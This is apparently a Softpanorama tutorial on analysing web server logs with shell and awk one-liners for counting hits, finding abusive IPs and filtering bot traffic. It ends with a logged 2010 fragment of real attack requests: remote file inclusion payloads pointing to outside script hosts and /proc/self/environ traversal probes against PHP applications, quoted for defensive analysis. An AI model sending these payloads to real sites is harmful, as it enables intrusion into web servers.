Softpanorama

May the source be with you, but remember the KISS principle ;-)

HTTP Server Log Analysis


Perl was designed for text processing, and it shines at this particular task. No other scripting language generally comes close.

Simple analysis of HTTP server logs can be done using just Perl (or another scripting language) and pipes, and very useful reports can be generated this way. The problem is that web server logs are now polluted, and it is not easy to distinguish legitimate requests that failed with code 404 (page not found) from bogus requests by the army of zombies accessing the website day and night. See Requests for non-existing web pages. That makes traditional log analyzers like AWStats much less useful. When AWStats is fed raw logs, the only thing its 404 section tells you is the level of zombie activity, not which pages or images might actually be missing. So before you apply AWStats to your logs, they need to be pre-filtered with a custom Perl script. This is impossible to do if you are using a Cheap Web hosting provider, so the problem is real and painful.
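A minimal sketch of such a pre-filter, written as a shell function around awk rather than as a full Perl script. The patterns it drops (requests for .php scripts on a site built from static .shtml pages, remote file inclusion payloads such as "=http://...", and /proc/self/environ traversal attempts) are assumptions based on the probes in the log fragment below, and the name prefilter_log is hypothetical:

```shell
# Hypothetical pre-filter: drop obvious probe requests from a combined-format
# log before handing it to AWStats. The patterns are ASSUMPTIONS taken from
# the probes seen on this site; adjust them to your own logs.
prefilter_log() {
    # $1 = input log; the filtered log goes to stdout.
    # Splitting on '"' makes $2 the request line ("GET /path HTTP/1.1").
    awk -F'"' '$2 !~ /\.php|=https?:\/\/|proc\/self\/environ/' "$1"
}
# Usage: prefilter_log access_log > access_log.filtered
```

A legitimate page such as /Scripting/php.shtml survives, because the pattern requires a literal ".php".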

The same is true for successful hits. I have seen many cases where a particular page suddenly jumped into the top ten most popular pages, and then discovered that this was caused by some script retrieving it in a loop. Sometimes the script retrieves not the whole page but just the header (a HEAD request).
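One way to spot such a looping script is to count requests per client address, method and URL: a single address fetching one page (or sending HEAD requests for it) thousands of times stands out at the top. A sketch, assuming the combined format with an ordinary three-word request line; top_ip_url_pairs is a hypothetical name:

```shell
# Hypothetical helper: the most frequent (client, method, URL) triples.
# With whitespace splitting, $1 is the client, $6 is '"GET' (with the quote)
# and $7 is the path, as long as the request line has no extra spaces.
top_ip_url_pairs() {
    # $1 = log file, $2 = how many triples to show (default 10)
    awk '{ print $1, $6, $7 }' "$1" | tr -d '"' | sort | uniq -c |
        sort -rn | head -n "${2:-10}"
}
# Usage: top_ip_url_pairs access_log 20
```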

Generally, approximately 6% of all IP addresses that access a web site belong to malignant users. For example, if your logs contain 100K distinct IP addresses, approximately 6K of them belong to malignant users and robots. Clearly it is impossible to block them all using simple methods. But you can and should deny access to the top abusers, say a dozen addresses in each category of malignant access. Of course those IP sets overlap, as many robots are engaged in several types of malignant activity.
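To find the top abusers in one category, you can rank client addresses by the number of responses with a given status code, for example 404 for requests for non-existing pages. A sketch, assuming the combined format; the function name top_ips_by_status and the default of 12 addresses (the "dozen" above) are illustrative choices:

```shell
# Hypothetical helper: top N client addresses that received a given status.
# Splitting on '"' keeps this working even when the request contains spaces.
top_ips_by_status() {
    # $1 = log file, $2 = status code, $3 = number of addresses (default 12)
    awk -F'"' -v code="$2" '{
        split($3, st, " ")          # $3 is " STATUS BYTES "
        if (st[1] == code) {
            split($1, host, " ")    # first word of $1 is the client address
            print host[1]
        }
    }' "$1" | sort | uniq -c | sort -rn | head -n "${3:-12}"
}
# Usage: top_ips_by_status access_log 404
```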

For a more or less popular web site, malignant robots distort web statistics so significantly that, without filtering them out, any judgment about which pages of your site are popular (to say nothing of more complex questions) is suspect. Usually the pages that look popular in unfiltered statistics owe that to the activities of referrer spammers or bangers. I have seen cases where a page was accessed tens of thousands of times a day and all accesses were "fake", coming from some undebugged robot or from some "is alive" type of script.
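A quick way to check whether a suspiciously popular page owes its hits to referrer spam is to look at the referrers recorded for it. A sketch, assuming the combined format and an exact match on the path (query strings are not stripped); top_referrers_for_page is a hypothetical name:

```shell
# Hypothetical helper: the most frequent Referer values for one page.
top_referrers_for_page() {
    # $1 = log file, $2 = exact URL path, $3 = how many (default 10)
    awk -F'"' -v page="$2" '{
        split($2, req, " ")            # req[2] is the requested path
        if (req[2] == page) print $4   # $4 is the Referer field
    }' "$1" | sort | uniq -c | sort -rn | head -n "${3:-10}"
}
# Usage: top_referrers_for_page access_log /index.shtml
```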

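Most web servers store their access log in what is called the "common log format." Each time a user requests a file from the server, a line containing the following fields is added to the end of the log file:

host: the IP address (or host name) of the client
ident: the RFC 1413 identity of the client, almost always "-"
authuser: the user name if the request was authenticated, otherwise "-"
date: the date and time of the request, in square brackets
request: the request line sent by the client, in double quotes
status: the HTTP status code returned to the client
bytes: the size of the object returned to the client, or "-" if nothing was returned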

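An extended version of this log format, often referred to as the "combined" format, includes two additional fields at the end:

referrer: the Referer header sent by the client, in double quotes ("-" if none)
user agent: the User-Agent header sent by the client, in double quotes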
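Most one-liners on this page rely on these field positions. The sketch below prints the nine fields of a combined-format line; splitting on the double quote first keeps the request and user agent intact even when they contain spaces. The function name show_fields is hypothetical, and escaped quotes inside fields are not handled:

```shell
# Hypothetical helper: print the fields of combined-format lines read on stdin.
show_fields() {
    awk -F'"' '{
        split($1, a, " ")   # host, ident, authuser, [date, zone]
        split($3, b, " ")   # status, bytes
        print "host:      " a[1]
        print "ident:     " a[2]
        print "authuser:  " a[3]
        print "date:      " a[4] " " a[5]
        print "request:   " $2
        print "status:    " b[1]
        print "bytes:     " b[2]
        print "referrer:  " $4
        print "useragent: " $6
    }'
}
# Usage: head -n 1 access_log | show_fields
```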

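Here is a very simple example of finding the most visited sites using pipes. It assumes a proxy server log in common or combined format, in which the request line contains the full URL (for example "GET http://example.com/page.html HTTP/1.1"), so the third '/'-separated field of the request is the host name:

gzip -dc "$1.gz" | grep '" 200' | cut -d '"' -f 2 | cut -d '/' -f 3 | \
     tr '[:upper:]' '[:lower:]' | sort | uniq -c | sort -rn > most_frequent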

Note: Most of the tips below were borrowed from ktmatu - One-liners by Matti Tukiainen; some have been modified. We assume that the web server log files (access_log*) are in combined format.

How to view log files without line wrapping?

less has the option -S (--chop-long-lines), which causes lines longer than the screen width to be chopped rather than folded. That is, the portion of a long line that does not fit in the screen width is not shown (you can scroll horizontally with the left and right arrow keys). The default is to fold long lines, that is, to display the remainder on the next line.
less -S access_log

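How many lines (hits) are there in the log file?

wc -l < access_log

(grep 200 access_log | wc -l counts only the lines that contain the string "200" anywhere, not all hits.) To count only successful (status 200) hits:

awk '$9 == 200' access_log | wc -l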

How many page views?

gzip -dc access_log.gz | grep -Evc '(\.gif |\.jpg |\.png )'
2569

How many hits today?

grep -c "$(LC_ALL=C date '+%d/%b/%Y')" access_log
2569

How many unique visitors (more precisely, unique IP addresses) today?

grep "$(LC_ALL=C date '+%d/%b/%Y')" access_log | cut -d" " -f1 | sort -u | wc -l
1196

How many hits on a particular day?
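A minimal sketch: count the lines whose timestamp starts with the given day. The day has to be written the way Apache writes it, for example 16/Aug/2010 (English month abbreviation); the function name hits_on_day is hypothetical:

```shell
# Hypothetical helper: number of hits on one day.
hits_on_day() {
    # $1 = day as DD/Mon/YYYY, $2 = log file
    # Anchoring on "[" and ":" avoids matching the date elsewhere in the line.
    grep -c "\[$1:" "$2"
}
# Usage: hits_on_day 16/Aug/2010 access_log
```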

What period is covered by the log?
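A sketch that prints the timestamps of the first and last entries. It assumes the log is in chronological order; Apache writes an entry when a request completes, so neighbouring entries can be slightly out of order. The name log_period is hypothetical:

```shell
# Hypothetical helper: "first-timestamp to last-timestamp" of a log file.
log_period() {
    # $1 = log file; the timestamp sits between the first "[" and "]"
    printf '%s to %s\n' \
        "$(head -n 1 "$1" | cut -d '[' -f 2 | cut -d ']' -f 1)" \
        "$(tail -n 1 "$1" | cut -d '[' -f 2 | cut -d ']' -f 1)"
}
# Usage: log_period access_log
```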

Are there missing dates?
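One possible check, sketched under two assumptions: the log is in chronological order, and GNU date is available (date -d is a GNU extension). It reports every gap of more than one day between consecutive dates that occur in the log; the name missing_dates is hypothetical:

```shell
# Hypothetical helper: report days with no entries between logged days.
missing_dates() {
    # $1 = log file. Extract DD/Mon/YYYY, collapse repeats, split into words.
    cut -s -d '[' -f 2 "$1" | cut -d ':' -f 1 | uniq | tr '/' ' ' |
    {
        prev_s=; prev_d=
        while read -r day mon year; do
            # Midnight UTC of this day in seconds since the epoch (GNU date)
            now=$(date -u -d "$day $mon $year" +%s) || continue
            if [ -n "$prev_s" ] && [ $((now - prev_s)) -gt 86400 ]; then
                echo "no entries between $prev_d and $day/$mon/$year"
            fi
            prev_s=$now
            prev_d="$day/$mon/$year"
        done
    }
}
# Usage: missing_dates access_log
```

Working in UTC keeps consecutive days exactly 86400 seconds apart, so daylight saving changes do not produce false gaps.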

How many corrupted log entries?

This is just a very quick and dirty way to check the log.
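In the same quick and dirty spirit, the sketch below counts lines that do not have the overall shape of a combined-format entry (three words, a bracketed date, a quoted request, a status, a size, and two quoted strings). It is not a validator: entries with escaped quotes inside the request are counted as corrupted. The name count_corrupted is hypothetical:

```shell
# Hypothetical helper: number of lines that do not look like combined format.
count_corrupted() {
    # $1 = log file
    grep -Evc '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} ([0-9]+|-) "[^"]*" "[^"]*"$' "$1"
}
# Usage: count_corrupted access_log
```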

What does line 15927, or lines 15920-15929, look like?
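sed can print a line or a range of lines by number. The sketch wraps it in a hypothetical function show_lines and adds a q command so that sed stops reading a large log once the last requested line has been printed:

```shell
# Hypothetical helper: print one line, or a range of lines, of a file.
show_lines() {
    # $1 = file, $2 = first line, $3 = last line (defaults to $2)
    # "N,Mp" prints the range; "Mq" quits right after line M.
    sed -n "${2},${3:-$2}p;${3:-$2}q" "$1"
}
# Usage: show_lines access_log 15927
#        show_lines access_log 15920 15929
```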

How to figure out the bandwidth consumption (in bytes)?
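A sketch that sums the size field of all entries. In Apache's common and combined formats this field counts the response body only, without HTTP headers, so the result somewhat underestimates the real traffic; entries with "-" (nothing sent) are skipped. The name total_bytes is hypothetical:

```shell
# Hypothetical helper: total bytes sent, from the size field of each entry.
total_bytes() {
    # $1 = log file; $3 after splitting on '"' is " STATUS BYTES "
    awk -F'"' '{
        split($3, st, " ")
        if (st[2] ~ /^[0-9]+$/) sum += st[2]
    } END { printf "%.0f\n", sum }' "$1"
}
# Usage: total_bytes access_log
```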

How to delete partial GET requests from the log?

Partial content requests (status 206) are usually generated by download managers, to speed up downloading of big files, and by Adobe Acrobat Reader, to fetch PDF documents page by page. In this example, the 206 responses to PDF requests made by Acrobat Reader are deleted so that they don't inflate the hit count.

grep -v '\.pdf .* 206 ' access_log > new_log

How to compress a selected portion of a log?
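A sketch that selects the entries for one day and writes them gzip-compressed to a separate file; any other selection (a sed line range, a grep on an IP address) can be piped into gzip the same way. The name compress_day is hypothetical:

```shell
# Hypothetical helper: save one day's entries as a compressed file.
compress_day() {
    # $1 = log file, $2 = day such as 16/Aug/2010, $3 = output .gz file
    grep "\[$2:" "$1" | gzip -9 > "$3"
}
# Usage: compress_day access_log 16/Aug/2010 access_log.2010-08-16.gz
```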

How to see in real time how the log file grows?
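tail can follow a file as it grows. The sketch below uses tail -F, which (in GNU and BSD tail) keeps following the file by name and therefore survives log rotation, and optionally filters the stream; grep --line-buffered makes matches appear immediately instead of in blocks. The name watch_log and the example pattern are illustrative:

```shell
# Hypothetical helper: follow a log, optionally showing only matching lines.
watch_log() {
    # $1 = log file, $2 = optional grep pattern such as ' 500 '
    if [ -n "$2" ]; then
        tail -F "$1" | grep --line-buffered -e "$2"
    else
        tail -F "$1"
    fi
}
# Usage: watch_log access_log ' 500 '    (stop with Ctrl-C)
```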

Recently the number of "strange" access records in web logs jumped, and it became interesting to analyze the logs and see what those "strange" users are doing. Here is one fragment that I found in 2010:

85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /Admin/Tivoli/TMF/Gateways/gateway_troubleshooting.shtml%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
67.223.224.130 - - [16/Aug/2010:07:14:51 -0600] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt?? HTTP/1.1" 302 824 "-" "libwww-perl/5.831"
67.223.224.130 - - [16/Aug/2010:07:14:52 -0600] "GET /400.shtml?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:37 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
89.111.176.226 - - [16/Aug/2010:07:43:47 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:50 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
125.164.72.146 - - [16/Aug/2010:07:48:59 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:00 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:01 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:08 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:09 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:10 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:19 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:20 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:21 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:40 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:41 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:42 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:43 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:44 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:45 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
91.121.1.124 - - [16/Aug/2010:07:52:17 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803"
